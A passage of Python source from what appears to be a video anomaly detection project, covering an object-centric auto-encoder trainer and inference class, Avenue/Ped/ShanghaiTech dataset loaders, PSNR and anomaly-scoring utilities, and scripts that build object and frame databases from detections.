global_steps = self.kwargs['writer_dict']['global_steps_{}'.format(self.kwargs['model_type'])]
# get the data
data, _ = next(self._train_loader_iter) # the core for dataloader
self.data_time.update(time.time() - start)
# base on the D to get each frame
# in this method, D = 3 and not change
future = data[:, :, -1, :, :].cuda() # t+1 frame
current = data[:, :, 1, :, :].cuda() # t frame
past = data[:, :, 0, :, :].cuda() # t-1 frame
bboxs = get_batch_dets(self.Detector, current)
        # this method is based on objects to train the model instead of whole frames
for index, bbox in enumerate(bboxs):
if bbox.numel() == 0:
bbox = bbox.new_zeros([1, 4])
# get the crop objects
input_currentObject_B, _ = multi_obj_grid_crop(current[index], bbox)
future_object, _ = multi_obj_grid_crop(future[index], bbox)
future2current = torch.stack([future_object, input_currentObject_B], dim=1)
past_object, _ = multi_obj_grid_crop(past[index], bbox)
current2past = torch.stack([input_currentObject_B, past_object], dim=1)
_, _, input_objectGradient_A = frame_gradient(future2current)
input_objectGradient_A = input_objectGradient_A.sum(1)
_, _, input_objectGradient_C = frame_gradient(current2past)
input_objectGradient_C = input_objectGradient_C.sum(1)
# import ipdb; ipdb.set_trace()
# True Process =================Start===================
_, output_recGradient_A = self.A(input_objectGradient_A)
_, output_recObject_B = self.B(input_currentObject_B)
_, output_recGradient_C = self.C(input_objectGradient_C)
# import ipdb; ipdb.set_trace()
loss_A = self.a_loss(output_recGradient_A, input_objectGradient_A)
loss_B = self.b_loss(output_recObject_B, input_currentObject_B)
loss_C = self.c_loss(output_recGradient_C, input_objectGradient_C)
loss_all = self.loss_lamada['A_loss'] * loss_A + self.loss_lamada['B_loss'] * loss_B + self.loss_lamada['C_loss'] * loss_C
self.optim_ABC.zero_grad()
loss_all.backward()
self.optim_ABC.step()
# record
self.loss_meter_ABC.update(loss_all.detach())
if self.config.TRAIN.general.scheduler.use:
self.lr_abc.step()
# ======================End==================
self.batch_time.update(time.time() - start)
if (current_step % self.log_step == 0):
msg = 'Step: [{0}/{1}]\t' \
'Type: {cae_type}\t' \
'Time: {batch_time.val:.2f}s ({batch_time.avg:.2f}s)\t' \
'Speed: {speed:.1f} samples/s\t' \
'Data: {data_time.val:.2f}s ({data_time.avg:.2f}s)\t' \
'Loss_ABC: {losses_ABC.val:.5f} ({losses_ABC.avg:.5f})\t'.format(current_step, self.max_steps, cae_type=self.kwargs['model_type'], batch_time=self.batch_time, speed=self.config.TRAIN.batch_size/self.batch_time.val, data_time=self.data_time,losses_ABC=self.loss_meter_ABC)
self.logger.info(msg)
writer.add_scalar('Train_loss_ABC', self.loss_meter_ABC.val, global_steps)
if (current_step % self.vis_step == 0):
vis_objects = OrderedDict()
vis_objects['train_input_objectGradient_A'] = input_objectGradient_A.detach()
vis_objects['train_input_currentObject_B'] = input_currentObject_B.detach()
vis_objects['train_input_objectGradient_C'] = input_objectGradient_C.detach()
vis_objects['train_output_recGradient_A'] = output_recGradient_A.detach()
vis_objects['train_output_recObject_B'] = output_recObject_B.detach()
vis_objects['train_output_recGradient_C'] = output_recGradient_C.detach()
tensorboard_vis_images(vis_objects, writer, global_steps, self.train_normalize, self.train_mean, self.train_std)
global_steps += 1
# reset start
start = time.time()
self.saved_model = {'A':self.A, 'B':self.B, 'C':self.C}
self.saved_optimizer = {'optim_ABC': self.optim_ABC}
self.saved_loss = {'loss_ABC':self.loss_meter_ABC.val}
self.kwargs['writer_dict']['global_steps_{}'.format(self.kwargs['model_type'])] = global_steps
def mini_eval(self, current_step):
if current_step % self.config.TRAIN.mini_eval_step != 0:
return
temp_meter_A = AverageMeter()
temp_meter_B = AverageMeter()
temp_meter_C = AverageMeter()
self.A.eval()
self.B.eval()
self.C.eval()
self.Detector.eval()
for data, _ in self.val_dataloader:
# base on the D to get each frame
# in this method, D = 3 and not change
future_mini = data[:, :, -1, :, :].cuda() # t+1 frame
current_mini = data[:, :, 1, :, :].cuda() # t frame
past_mini = data[:, :, 0, :, :].cuda() # t-1 frame
bboxs_mini = get_batch_dets(self.Detector, current_mini)
for index, bbox in enumerate(bboxs_mini):
if bbox.numel() == 0:
bbox = bbox.new_zeros([1, 4])
# get the crop objects
input_currentObject_B, _ = multi_obj_grid_crop(current_mini[index], bbox)
future_object, _ = multi_obj_grid_crop(future_mini[index], bbox)
future2current = torch.stack([future_object, input_currentObject_B], dim=1)
past_object, _ = multi_obj_grid_crop(past_mini[index], bbox)
current2past = torch.stack([input_currentObject_B, past_object], dim=1)
_, _, input_objectGradient_A = frame_gradient(future2current)
input_objectGradient_A = input_objectGradient_A.sum(1)
_, _, input_objectGradient_C = frame_gradient(current2past)
input_objectGradient_C = input_objectGradient_C.sum(1)
_, output_recGradient_A = self.A(input_objectGradient_A)
_, output_recObject_B = self.B(input_currentObject_B)
_, output_recGradient_C = self.C(input_objectGradient_C)
psnr_A = psnr_error(output_recGradient_A.detach(), input_objectGradient_A)
psnr_B = psnr_error(output_recObject_B.detach(), input_currentObject_B)
psnr_C = psnr_error(output_recGradient_C.detach(), input_objectGradient_C)
temp_meter_A.update(psnr_A.detach())
temp_meter_B.update(psnr_B.detach())
temp_meter_C.update(psnr_C.detach())
self.logger.info(f'&^*_*^& ==> Step:{current_step}/{self.max_steps} the A PSNR is {temp_meter_A.avg:.2f}, the B PSNR is {temp_meter_B.avg:.2f}, the C PSNR is {temp_meter_C.avg:.2f}')
class Inference(DefaultInference):
NAME = ["OCAE.INFERENCE"]
def __init__(self, *defaults,**kwargs):
'''
Args:
defaults(tuple): the default will have:
0->model: the model of the experiment
1->model_path: the path of the model path
2->val_dataloader: the dataloader to inference
3->logger: the logger of the whole process
4->config: the config object of the whole process
kwargs(dict): the default will have:
verbose(str):
parallel(bool): True-> data parallel
pertrain(bool): True-> use the pretrained model
mode(str): 'dataset' -> the data will be passed in through the dataloader (discarded, because we use the dataset to get everything we need)
'''
self._hooks = []
self._register_hooks(kwargs['hooks'])
self.logger = defaults[3]
self.config = defaults[4]
self.model_path = defaults[1]
save_model = torch.load(self.model_path)
model = defaults[0]
if kwargs['parallel']:
self.A = self.data_parallel(model['A'])
self.B = self.data_parallel(model['B'])
self.C = self.data_parallel(model['C'])
self.Detector = self.data_parallel(model['Detector'])
else:
self.A = model['A'].cuda()
self.B = model['B'].cuda()
self.C = model['C'].cuda()
self.Detector = model['Detector'].cuda()
# self.load()
self.verbose = kwargs['verbose']
self.kwargs = kwargs
self.config_name = kwargs['config_name']
self.normalize = self.config.ARGUMENT.val.normal.use
self.mean = self.config.ARGUMENT.val.normal.mean
self.std = self.config.ARGUMENT.val.normal.std
# self.mode = kwargs['mode']
self.test_dataset_keys = kwargs['test_dataset_keys']
self.test_dataset_dict = kwargs['test_dataset_dict']
self.test_dataset_keys_w = kwargs['test_dataset_keys_w']
self.test_dataset_dict_w = kwargs['test_dataset_dict_w']
self.metric = 0.0
self.evaluate_function = kwargs['evaluate_function']
def inference(self):
for h in self._hooks:
h.inference()
```
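For orientation, the trainer above exposes its three auto-encoders through `saved_model`, and `Inference` later receives a checkpoint path that it reads with `torch.load`. The actual persistence is handled by hooks elsewhere in the repo; the following is only a hedged sketch of that round trip, with `nn.Identity` standing in for the A/B/C auto-encoders.

```python
import torch
import torch.nn as nn

# stand-ins for the three object-centric auto-encoders (any nn.Module works for the sketch)
A, B, C = nn.Identity(), nn.Identity(), nn.Identity()

# save state_dicts under the same keys used by `saved_model` above
torch.save({'A': A.state_dict(), 'B': B.state_dict(), 'C': C.state_dict()}, 'ocae_final.pth')

# reload on CPU before handing the modules to the inference stage
checkpoint = torch.load('ocae_final.pth', map_location='cpu')
A.load_state_dict(checkpoint['A'])
```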
#### File: lib/datatools/build_evaluate.py
```python
from lib.datatools.evaluate.eval_function import eval_functions
class EvaluateAPI(object):
def __init__(self, cfg, logger):
self.cfg = cfg
self.logger = logger
def __call__(self, eval_function_type):
assert eval_function_type in eval_functions, f'there is no type of evaluation {eval_function_type}, please check {eval_functions.keys()}'
self.logger.info(f'==> Using the eval function: {eval_function_type}')
t = eval_functions[eval_function_type]
return t
```
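A hedged usage sketch of the evaluate builder follows; `cfg` is assumed to be the project config node built elsewhere, and `'compute_auc'` is only a placeholder key, the real choices are whatever `eval_functions` registers.

```python
import logging

logger = logging.getLogger('evaluate')
evaluate_api = EvaluateAPI(cfg, logger)   # `cfg` assumed to exist
eval_fn = evaluate_api('compute_auc')     # unknown keys trip the assert above
```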
#### File: datatools/dataclass/avenue_ped_shanghai.py
```python
import torch
import numpy as np
import cv2
from collections import OrderedDict
import glob
import os
from torch.utils.data import Dataset
from lib.datatools.abstract.anomaly_video_dataset import AbstractVideoAnomalyDataset
from lib.datatools.abstract.tools import ImageLoader, VideoLoader
from colorama import init,Fore
init(autoreset=True)
class AvenuePedShanghai(AbstractVideoAnomalyDataset):
_NAME = 'AvenuePedShanghai Dataset'
def custom_setup(self):
self.image_loader = ImageLoader(read_format=self.cfg.DATASET.read_format, channel_num=self.cfg.DATASET.channel_num, channel_name=self.cfg.DATASET.channel_name)
# self.image_loader = ImageLoader(read_format=self.cfg.DATASET.read_format,transforms=self.transforms, normalize=self.normal, mean=self.normal_mean, std=self.normal_std)
self.video_loader = VideoLoader(self.image_loader, params=self.aug_params, transforms=self.transforms, normalize=self.normal, mean=self.normal_mean, std=self.normal_std)
print(f'The read format of train dataset is {self.cfg.DATASET.read_format} in {self._NAME}')
def _get_frames(self, indice):
key = list(self.videos_keys)[indice]
cursor = self.videos[key]['cursor']
if (cursor + self.clip_length) > self.videos[key]['length']:
cursor = 0
start = cursor
video_clip, video_clip_original = self.video_loader.read(self.videos[key]['frames'], start, start+self.clip_length, clip_length=self.clip_length,step=self.frame_step)
self.videos[key]['cursor'] = cursor + self.clip_step
return video_clip, video_clip_original
def get_image(self, image_name):
# keep for debug
image = self.image_loader.read(image_name)
return image
class AvenuePedShanghaiOneVideo(AbstractVideoAnomalyDataset):
'''
Only loads a single video instead of the whole dataset,
so it is instantiated once per video when iterating over the full set.
'''
_NAME = 'AvenuePedShanghaiOneVideo Dataset'
def __init__(self, dataset_folder, clip_length, frame_step, clip_step=1, transforms=None, is_training=True, one_video=True, cfg=None):
super(AvenuePedShanghaiOneVideo, self).__init__(dataset_folder, clip_length, frame_step=frame_step,clip_step=clip_step, transforms=transforms, is_training=is_training, one_video=one_video, cfg=cfg)
def custom_setup(self):
self.image_loader = ImageLoader(read_format=self.cfg.DATASET.read_format, channel_num=self.cfg.DATASET.channel_num, channel_name=self.cfg.DATASET.channel_name)
# self.image_loader = ImageLoader(read_format=self.cfg.DATASET.read_format,transforms=self.transforms, normalize=self.normal, mean=self.normal_mean, std=self.normal_std)
self.video_loader = VideoLoader(self.image_loader, params=self.aug_params, transforms=self.transforms, normalize=self.normal, mean=self.normal_mean, std=self.normal_std)
def __len__(self):
return self.pics_len
def _get_frames(self, indice):
start = (indice * self.clip_step) % self.pics_len
if start + self.clip_length >= self.pics_len:
end = self.pics_len - 1
else:
end = start + self.clip_length
video_clip, video_clip_original = self.video_loader.read(self.videos['frames'], start, end, clip_length=self.clip_length, step=self.frame_step)
return video_clip, video_clip_original
def get_image(self,name):
# keep for debug
image = self.image_loader.read(name)
return image
class MiniAvenuePedShanghai(AbstractVideoAnomalyDataset):
_NAME = 'MiniAvenuePedShanghai Dataset'
def custom_setup(self):
# self.image_loader = ImageLoader(read_format=self.cfg.DATASET.read_format,transforms=self.transforms, normalize=self.normal, mean=self.normal_mean, std=self.normal_std)
self.image_loader = ImageLoader(read_format=self.cfg.DATASET.read_format, channel_num=self.cfg.DATASET.channel_num, channel_name=self.cfg.DATASET.channel_name)
self.video_loader = VideoLoader(self.image_loader, params=self.aug_params, transforms=self.transforms, normalize=self.normal, mean=self.normal_mean, std=self.normal_std)
self.video_nums = len(self.videos_keys)
def _get_frames(self, indice):
temp = indice % self.video_nums
key = list(self.videos_keys)[temp]
rng = np.random.RandomState(2020)
# import ipdb; ipdb.set_trace()
start = rng.randint(0, self.videos[key]['length'] - self.clip_length)
video_clip, video_clip_original = self.video_loader.read(self.videos[key]['frames'], start, start+self.clip_length, clip_length=self.clip_length, step=self.clip_step)
return video_clip, video_clip_original
def __len__(self):
return self.cfg.DATASET.mini_dataset.samples
def get_image(self, image_name):
image = self.image_loader.read(image_name)
return image
# -----------------Functions Part-------------------------
def _get_test_dataset(cfg, aug):
dataset_list = OrderedDict()
video_dirs = os.listdir(cfg.DATASET.test_path)
video_dirs.sort()
for t_dir in video_dirs:
_temp_test_folder = os.path.join(cfg.DATASET.test_path, t_dir)
dataset = AvenuePedShanghaiOneVideo(_temp_test_folder, clip_length=cfg.DATASET.test_clip_length, clip_step=cfg.DATASET.test_clip_step, frame_step=cfg.DATASET.test_frame_step,transforms=aug, cfg=cfg)
dataset_list[t_dir] = dataset
video_keys = list(dataset_list.keys())
return (dataset_list, video_keys)
def _get_train_w_dataset(cfg, aug):
dataset_list = OrderedDict()
video_dirs = os.listdir(cfg.DATASET.train_path)
video_dirs.sort()
for t_dir in video_dirs:
_temp_test_folder = os.path.join(cfg.DATASET.train_path, t_dir)
dataset = AvenuePedShanghaiOneVideo(_temp_test_folder, clip_length=cfg.DATASET.train_clip_length, clip_step=cfg.DATASET.train_clip_step, frame_step=cfg.DATASET.train_frame_step,transforms=aug, cfg=cfg)
dataset_list[t_dir] = dataset
video_keys = list(dataset_list.keys())
return (dataset_list, video_keys)
def _get_cluster_dataset(cfg, aug):
dataset_list = OrderedDict()
video_dirs = os.listdir(cfg.DATASET.train_path)
video_dirs.sort()
for t_dir in video_dirs:
_temp_train_folder = os.path.join(cfg.DATASET.train_path, t_dir)
dataset = AvenuePedShanghaiOneVideo(_temp_train_folder, clip_length=cfg.DATASET.train_clip_length, clip_step=cfg.DATASET.train_clip_step, frame_step=cfg.DATASET.train_frame_step,is_training=True, transforms=aug, cfg=cfg)
dataset_list[t_dir] = dataset
video_keys = list(dataset_list.keys())
return (dataset_list, video_keys)
def get_avenue_ped_shanghai(cfg, flag, aug):
'''
Use this function to build the dataset variant that matches the given flag
'''
if flag == 'train':
t = AvenuePedShanghai(cfg.DATASET.train_path, clip_length=cfg.DATASET.train_clip_length, clip_step=cfg.DATASET.train_clip_step, frame_step=cfg.DATASET.train_frame_step,transforms=aug, cfg=cfg)
elif flag == 'val':
t = MiniAvenuePedShanghai(cfg.DATASET.test_path, clip_length=cfg.DATASET.test_clip_length, clip_step=cfg.DATASET.test_clip_step, frame_step=cfg.DATASET.test_frame_step, transforms=aug, cfg=cfg)
print(Fore.RED + 'Using the mini dataset!!!!')
elif flag == 'test':
t = _get_test_dataset(cfg, aug)
elif flag == 'train_w':
t = _get_train_w_dataset(cfg, aug)
elif flag == 'cluster_train':
t = _get_cluster_dataset(cfg, aug)
return t
if __name__ == '__main__':
import ipdb; ipdb.set_trace()
```
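For reference, the factory above is driven with one of the five flags; a hedged sketch, assuming `cfg` and an augmentation pipeline `aug` built elsewhere in the repo:

```python
train_set = get_avenue_ped_shanghai(cfg, 'train', aug)            # AvenuePedShanghai over the train path
mini_val = get_avenue_ped_shanghai(cfg, 'val', aug)               # MiniAvenuePedShanghai, fixed sample count
test_dict, test_keys = get_avenue_ped_shanghai(cfg, 'test', aug)  # one AvenuePedShanghaiOneVideo per video dir
```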
#### File: datatools/evaluate/utils.py
```python
import numpy as np
import os
import pickle
import torch
from collections import OrderedDict
from .gtloader import GroundTruthLoader
from scipy.ndimage import gaussian_filter1d
def load_pickle_results(loss_file, cfg):
with open(loss_file, 'rb') as reader:
# results {
# 'dataset': the name of dataset
# 'psnr': the psnr of each testing videos,
# 'flow': [],
# 'names': [],
# 'diff_mask': [],
# 'score': the score of each testing videos
# 'num_videos': the number of the videos
# }
# psnr_records['psnr'] is np.array, shape(#videos)
# psnr_records[0] is np.array ------> 01.avi
# psnr_records[1] is np.array ------> 02.avi
# ......
# psnr_records[n] is np.array ------> xx.avi
results = pickle.load(reader)
dataset = results['dataset']
psnr_records = results['psnr']
score_records = results['score']
num_videos = results['num_videos']
# import ipdb; ipdb.set_trace()
if cfg.DATASET.smooth.guassian:
score_records = results['score_smooth']
psnr_records = results['psnr_smooth']
# new_score = []
# for index, item in enumerate(score):
# temp = gaussian_filter1d(score[index], cfg.DATASET.smooth.guassian_sigma)
# new_score.append(temp)
# print(f'Smooth the score with sigma:{cfg.DATASET.smooth.guassian_sigma}')
else:
score_records = results['score']
psnr_records = results['psnr']
# score = np.array(new_score)
assert dataset == cfg.DATASET.name, f'The dataset are not match, Result:{dataset}, cfg:{cfg.DATASET.name}'
# load ground truth
gt_loader = GroundTruthLoader(cfg)
# gt = gt_loader(dataset=dataset)
gt = gt_loader()
assert num_videos == len(gt), f'the number of saved videos does not match the ground truth, {num_videos} != {len(gt)}'
return dataset, psnr_records, score_records, gt, num_videos
def psnr_error(gen_frames, gt_frames, max_val_hat=1.0):
"""
Computes the Peak Signal to Noise Ratio error between the generated images and the ground
truth images.
@param gen_frames: A tensor of shape [batch_size, channels, height, width]. The frames generated by the
generator model.
@param gt_frames: A tensor of shape [batch_size, channels, height, width]. The ground-truth frames for
each frame in gen_frames.
@return: A scalar tensor. The mean Peak Signal to Noise Ratio error over each frame in the
batch.
"""
gen_frames = gen_frames.detach().cpu()
gt_frames = gt_frames.detach().cpu()
batch_num = gen_frames.shape[0]
batch_errors = 0.0
for i in range(0, batch_num):
num_pixels = gen_frames[i].numel()
# max_val_hat = gen_frames[i].max()
max_val = gt_frames[i].max()
square_diff = (gt_frames[i] - gen_frames[i])**2
log_value = torch.log10(max_val ** 2 / ((1. / num_pixels) * torch.sum(square_diff)))
image_errors = 10 * log_value
batch_errors += image_errors
batch_errors = torch.div(batch_errors, batch_num)
return batch_errors
def simple_diff(frame_true, frame_hat, flow_true, flow_hat, aggregation=False):
"""
"""
assert frame_true.shape == frame_hat.shape
assert flow_true.shape == flow_hat.shape
frame_true = frame_true.squeeze(0).detach()
frame_hat = frame_hat.squeeze(0).detach()
flow_true = flow_true.squeeze(0).detach()
flow_hat = flow_hat.squeeze(0).detach()
loss_appe = (frame_true-frame_hat)**2
loss_flow = (flow_true-flow_hat)**2
if aggregation:
loss_appe = torch.mean(loss_appe)
loss_flow = torch.mean(loss_flow)
return loss_appe, loss_flow
def find_max_patch(diff_map_appe, diff_map_flow, kernel_size=16, stride=4, aggregation=True):
'''
kernel size = window size
'''
# max_pool = torch.nn.MaxPool2d(kernel_size=kernel_size, stride=stride)
avg_pool = torch.nn.AvgPool2d(kernel_size=kernel_size, stride=stride)
max_patch_appe = avg_pool(diff_map_appe)
max_patch_flow = avg_pool(diff_map_flow)
# import ipdb; ipdb.set_trace()
assert len(max_patch_appe.shape) == 3, f'the shape of max_patch_appe is {max_patch_appe.shape}'
assert len(max_patch_flow.shape) == 3, f'the shape of max_patch_flow is {max_patch_flow.shape}'
if aggregation:
# average over the channel dim
max_patch_appe = torch.mean(max_patch_appe, dim=0)
max_patch_flow = torch.mean(max_patch_flow, dim=0)
max_appe_value = torch.max(max_patch_appe)
max_flow_value = torch.max(max_patch_flow)
# max_val_flow_std = 0.0
# max_val_appe_std = 0.0
# pos_flow_std = [0, 0]
# pos_appe_std = [0, 0]
# for i in range(0, diff_map_flow.shape[0]-kernel_size, stride):
# for j in range(0, diff_map_flow.shape[1]-kernel_size, stride):
# curr_std_flow = torch.std(diff_map_flow[i:i+kernel_size, j:j+kernel_size])
# # curr_mean = np.mean(diff_map_flow[i:i+kernel_size, j:j+kernel_size])
# # curr_std_appe = torch.std(diff_map_appe[i:i+kernel_size, j:j+kernel_size])
# # curr_mean_appe = np.mean(diff_map_appe[i:i+kernel_size, j:j+kernel_size])
# # if curr_mean > max_val_mean:
# # max_val_mean = curr_mean
# # std_1 = curr_std
# # pos_1 = [i, j]
# # std_appe_1 = curr_std_appe
# # mean_appe_1 = curr_mean_appe
# if curr_std_flow > max_val_flow_std:
# max_val_flow_std = curr_std_flow
# # mean_2 = curr_mean
# pos_flow_std = [i, j]
# # std_appe_2 = curr_std_appe
# # mean_appe_2 = curr_mean_appe
# for i in range(0, diff_map_appe.shape[0]-kernel_size, stride):
# for j in range(0, diff_map_appe.shape[1]-kernel_size, stride):
# # curr_std_flow = torch.std(diff_map_flow[i:i+kernel_size, j:j+kernel_size])
# # curr_mean = np.mean(diff_map_flow[i:i+kernel_size, j:j+kernel_size])
# curr_std_appe = torch.std(diff_map_appe[i:i+kernel_size, j:j+kernel_size])
# # curr_mean_appe = np.mean(diff_map_appe[i:i+kernel_size, j:j+kernel_size])
# # if curr_mean > max_val_mean:
# # max_val_mean = curr_mean
# # std_1 = curr_std
# # pos_1 = [i, j]
# # std_appe_1 = curr_std_appe
# # mean_appe_1 = curr_mean_appe
# if curr_std_appe > max_val_appe_std:
# max_val_appe_std = curr_std_appe
# # mean_2 = curr_mean
# pos_appe_std = [i, j]
# # std_appe_2 = curr_std_appe
# # mean_appe_2 = curr_mean_appe
app_h, app_w = torch.where(torch.eq(max_patch_appe, max_appe_value))
flow_h, flow_w = torch.where(torch.eq(max_patch_flow, max_flow_value))
max_appe_final = max_appe_value
max_flow_final = max_flow_value
# max_appe_final = torch.div(max_appe_value, kernel_size**2)
# max_flow_final = torch.div(max_flow_value, kernel_size**2)
# import ipdb; ipdb.set_trace()
# return max_patch_appe, max_patch_flow
return max_appe_final, max_flow_final, (app_h, app_w), (flow_h, flow_w)
# return max_val_appe_std, max_val_flow_std, (app_h, app_w), (flow_h, flow_w)
def calc_w(w_dict):
wf = 0.0
wi = 0.0
n = 0
for key in w_dict.keys():
# n += w_dict[key][0]
n += 1
wf += w_dict[key][1]
wi += w_dict[key][2]
# import ipdb; ipdb.set_trace()
wf = torch.div(1.0, torch.div(wf, n))
wi = torch.div(1.0, torch.div(wi, n))
return wf, wi
def amc_normal_score(wf, sf, wi, si, lambada_s=0.2):
final_score = torch.log(wf * sf) + lambada_s * torch.log(wi*si)
return final_score
def amc_score(frame, frame_hat, flow, flow_hat, wf, wi, kernel_size=16, stride=4, lambada_s=0.2):
'''
wf, wi is different from videos
'''
loss_appe, loss_flow = simple_diff(frame, frame_hat, flow, flow_hat)
max_patch_appe, max_patch_flow, app_cord, flow_crod = find_max_patch(loss_appe, loss_flow, kernel_size=kernel_size, stride=stride)
final_score = amc_normal_score(wf, max_patch_appe, wi, max_patch_flow, lambada_s=lambada_s)
return final_score, app_cord, flow_crod
def oc_score(raw_data):
object_score = np.empty(shape=(raw_data.shape[0],),dtype=np.float32)
for index, dummy_objects in enumerate(raw_data):
# temp = np.max(-dummy_objects)
temp = np.max(dummy_objects)
object_score[index] = temp
frame_score = np.max(object_score)
return frame_score
def reconstruction_loss(x_hat, x):
'''
The input is the video clip, and we use the RL as the score.
RL := Reconstruction Loss
'''
x_hat = x_hat.squeeze(0).detach()
x = x.squeeze(0).detach()
rl = torch.sqrt(torch.pow((x_hat - x), 2))
h_dim = len(rl.shape) - 2
w_dim = len(rl.shape) - 1
rl = torch.mean(rl, (h_dim, w_dim))
return rl
```
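The PSNR and OC-score helpers above can be smoke-tested in isolation. A small sketch with random tensors, assuming `psnr_error` and `oc_score` from this file are in scope; shapes follow the channels-first layout used elsewhere in the repo.

```python
import numpy as np
import torch

gt = torch.rand(4, 3, 64, 64)
noisy = gt + 0.05 * torch.randn_like(gt)
print(psnr_error(noisy, gt))        # finite value, roughly 26 dB for this noise level
print(psnr_error(gt.clone(), gt))   # inf, since the squared difference is zero

raw = np.random.rand(5, 10).astype(np.float32)   # 5 objects x 10 anomaly scores per frame
print(oc_score(raw))                             # frame score = largest per-object maximum
```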
#### File: lib/datatools/tools.py
```python
import os
import sys
import cv2
sys.path.append('../../')
print(sys.path)
import json
import torch
from PIL import Image
import numpy as np
from pathlib import Path
import torchvision.transforms.functional as tf
from tqdm import tqdm
from lib.utils.image_ops import image_gradient
def make_objects_db(data_path, split='training',det_threshold=0.95, time_file='./training_3.json', verbose='none'):
"""
Make the database based on the detections
Args:
data_path: e.g. 'data/shanghaitech/normal'
det_threshold: 0.5
"""
original_path = Path(data_path) / split
detection_path = original_path / 'detection_cascade'
images_path = original_path / 'frames'
print(original_path)
final_path = original_path / 'objects'
# temp_folder = './temp'
if not os.path.exists(final_path):
os.makedirs(final_path)
final = dict()
with open(time_file, 'r') as f:
temp = json.load(f)
det_results = sorted(os.listdir(detection_path))
pbar = tqdm(range(len(det_results)))
# count = 0
for frame_det in det_results:
pbar.set_description('Processing: {}'.format(frame_det))
video_name = '_'.join(frame_det.split('.')[0].split('_')[0:-1])
image_name = frame_det.split('.')[0].split('_')[-1]
npy_file = detection_path / frame_det
detections = np.load(npy_file)
finals = _produce_detection(detections[0], detections[1], detections[2], detections[3], detections[7])
# finals = _produce_detection(detections[0])
for index, det in enumerate(finals):
if det[4] <= det_threshold:
continue
current_frame = frame_det.split('.')[0]
back_frame = temp[current_frame]['back']
front_frame = temp[current_frame]['front']
object_c = _crop_det_cv2(images_path / video_name / (image_name + '.jpg'), det)
object_b = _crop_det_cv2(images_path / video_name / (back_frame + '.jpg'), det)
object_f = _crop_det_cv2(images_path / video_name / (front_frame + '.jpg'), det)
try:
back_gradient_x, back_gradient_y = image_gradient(object_b.unsqueeze_(0).unsqueeze_(0))
except Exception as err:
print(err)
import ipdb; ipdb.set_trace()
back_gradient = torch.cat([back_gradient_x, back_gradient_y], dim=1).squeeze_(0)
front_gradient_x, front_gradient_y = image_gradient(object_f.unsqueeze_(0).unsqueeze_(0))
front_gradient = torch.cat([front_gradient_x, front_gradient_y], dim=1).squeeze_(0)
# import ipdb; ipdb.set_trace()
final[frame_det.split('.')[0] + '#' +str(index)] = dict()
final[frame_det.split('.')[0] + '#' +str(index)]['current'] = object_c
final[frame_det.split('.')[0] + '#' +str(index)]['back_gradient'] = back_gradient
final[frame_det.split('.')[0] + '#' +str(index)]['front_gradient'] = front_gradient
# count += 1
pbar.update(1)
# if count > 20:
# break
try:
final_name = final_path / (split + '_' + verbose + '.pt')
torch.save(final, final_name)
except Exception as err:
print(err)
def _produce_detection(*args):
# make the empty detection format
dummy = np.array([0,0,0,0,0], dtype=np.float64)
lm = lambda x: x if x.size > 0 else np.array([dummy])
init = np.array([dummy])
for detect in args:
# pad the None object
new_detect = lm(detect)
# make them in one array
init = np.concatenate((init, new_detect))
# filter the not empty ones
f = filter(lambda x : (x != np.array(dummy)).any(), init)
new_init = [x for x in f]
# deal with the situation of no detection
if new_init == []:
new_init = np.array([dummy])
return new_init
def _crop_det(image_path, det, mode='gray'):
'''
Args:
mode: 'gray' or 'rgb'
'''
img = Image.open(image_path).convert('L')
xmin = det[0]
ymin = det[1]
xmax = det[2]
ymax = det[3]
height = ymax - ymin
width = xmax -xmin
temp_obj = tf.crop(img, int(ymin), int(xmin), int(height), int(width)) # ymin, xmin, height, width
obj = tf.to_tensor(temp_obj)
return obj
def _crop_det_cv2(image_path, det):
'''
Crop the detection box from the image, which is read in grayscale via cv2.
'''
print(image_path)
image_path = str(image_path)
try:
img = cv2.imread(image_path, 0)
except:
print('in _crop_cv2')
import ipdb; ipdb.set_trace()
xmin = int(det[0])
ymin = int(det[1])
xmax = int(det[2])
ymax = int(det[3])
height = ymax - ymin
width = xmax -xmin
# temp_obj = tf.crop(img, int(ymin), int(xmin), int(height), int(width)) # ymin, xmin, height, width
temp_obj = img[ymin:ymax, xmin:xmax] # ymin, xmin, height, width
obj = torch.from_numpy(temp_obj)
return obj
def _get_gradient(image_1, image_2):
'''
images_1 - images_2
'''
gradient = lambda x, y: x - y
# images_pair = zip(images_1, images_2)
# gs = list() # gs = gradients of the images
# for x, y in images_pair:
im_1 = tf.to_tensor(image_1)
im_2 = tf.to_tensor(image_2)
gs = gradient(im_1,im_2)
# gs.append(temp)
return gs
def make_global_db(data_path, split='testing'):
"""
Make the database based on the detections
Args:
data_path: e.g. 'data/shanghaitech/normal'
"""
original_path = Path(data_path)
final_path = original_path / 'global'
images_path = original_path / 'frames'
# temp_folder = './temp'
if not os.path.exists(final_path):
os.makedirs(final_path)
final = dict()
# with open(time_file, 'r') as f:
# temp = json.load(f)
video_list = sorted(os.listdir(images_path))
pbar = tqdm(range(len(video_list)))
# count = 0
for video in video_list:
pbar.set_description('Processing: {}'.format(video))
video_path = images_path / video
# finals = _produce_detection(detections[0])
images_list = sorted(os.listdir(video_path))
for index, image in enumerate(images_list):
temp = Image.open(video_path / image).convert('L')
final[video + '#' +str(index)] = temp
# count += 1
pbar.update(1)
# if count > 20:
# break
final_name = final_path / (split + '.pt')
torch.save(final, final_name)
def decide_back_front(dataset_path, verbose='testing_vad', duration=3):
'''
decide the back and front, save in json
Args:
dataset_path: e.g. './data/shanghaitech/training/frames'
duration: step, e.g. current-3, current+3
'''
video_path = Path(dataset_path)
video_list = sorted(os.listdir(video_path))
final = dict()
for video in video_list:
frames_list = sorted(os.listdir(video_path / video))
for index, _ in enumerate(frames_list):
# get the frame `duration` steps before the current frame (back)
if index - duration <= 0:
img_b = frames_list[0]
else:
img_b = frames_list[index - duration]
# get the frame `duration` steps after the current frame (front)
if index + duration >= len(frames_list):
img_f = frames_list[-1]
else:
img_f = frames_list[index + duration]
# get the image name
img_current = video + '_' + frames_list[index].split('.')[0]
final[img_current] = dict()
# final[img_current]['back'] = video + '_' + img_b.split('.')[0]
final[img_current]['back'] = img_b.split('.')[0]
# final[img_current]['front'] = video + '_' + img_f.split('.')[0]
final[img_current]['front'] = img_f.split('.')[0]
with open(verbose+'_'+str(duration) + '.json', 'w') as f:
json.dump(final, f)
print('finish')
def make_objects_box_db(data_path, split='training',det_threshold=0.95, time_file='./training_3.json', verbose='none'):
"""
Make the database based on the detections
Args:
data_path: e.g. 'data/shanghaitech/normal'
det_threshold: 0.5
"""
original_path = Path(data_path) / split
detection_path = original_path / 'detection_cascade'
# images_path = original_path / 'frames'
print(original_path)
